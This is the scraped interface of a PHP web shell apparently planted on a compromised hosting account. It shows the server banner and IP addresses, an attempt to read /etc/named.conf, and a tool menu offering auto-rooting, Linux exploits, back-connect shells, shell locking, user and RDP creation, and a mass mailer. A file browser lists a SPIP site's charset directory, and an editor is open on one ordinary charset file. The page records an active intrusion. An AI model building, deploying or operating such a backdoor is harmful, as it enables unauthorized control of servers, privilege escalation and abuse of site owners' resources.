Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
grice /
ecrire /
charsets /
[ HOME SHELL ]
Name
Size
Permission
Action
cp1250.php
2.33
KB
-rw----r--
cp1251.php
2.33
KB
-rw----r--
cp1256.php
2.38
KB
-rw----r--
html.php
2.74
KB
-rw----r--
index.php
2
B
-rw----r--
iso-8859-1.php
2.04
KB
-rw----r--
iso-8859-15.php
1.1
KB
-rw----r--
iso-8859-6.php
1.88
KB
-rw----r--
iso-8859-9.php
1.1
KB
-rw----r--
mathml.php
42.4
KB
-rw----r--
translit.php
5.27
KB
-rw----r--
translitcomplexe.php
3.22
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : iso-8859-9.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Déclaration des correspondances entre charsets iso-8859-9 (Turc) et unicode * * @author <alexis@nds.k12.tr> * * @package SPIP\Core\Charsets **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } load_charset('iso-8859-1'); $trans = $GLOBALS['CHARSET']['iso-8859-1']; $trans[240] = 287; //gbreve $trans[208] = 286; //Gbreve $trans[221] = 304; //Idot $trans[253] = 305; //inodot $trans[254] = 351; //scedil $trans[222] = 350; //Scedil $GLOBALS['CHARSET']['iso-8859-9'] = $trans;
Close